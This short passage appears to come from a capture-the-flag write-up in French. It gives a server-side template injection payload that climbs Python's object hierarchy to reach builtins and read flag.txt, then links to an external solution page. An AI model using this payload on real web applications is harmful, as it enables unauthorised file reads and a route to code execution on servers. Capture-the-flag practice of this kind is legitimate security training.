
**Payload principal**    

    {{self.__class__.__base__.__subclasses__()[133].__init__.__globals__['__builtins__'].open('flag.txt').read()}}


Site de resolution du challenge: [www.bbsmax](https://www.bbsmax.com/A/D854qbpxdE/)
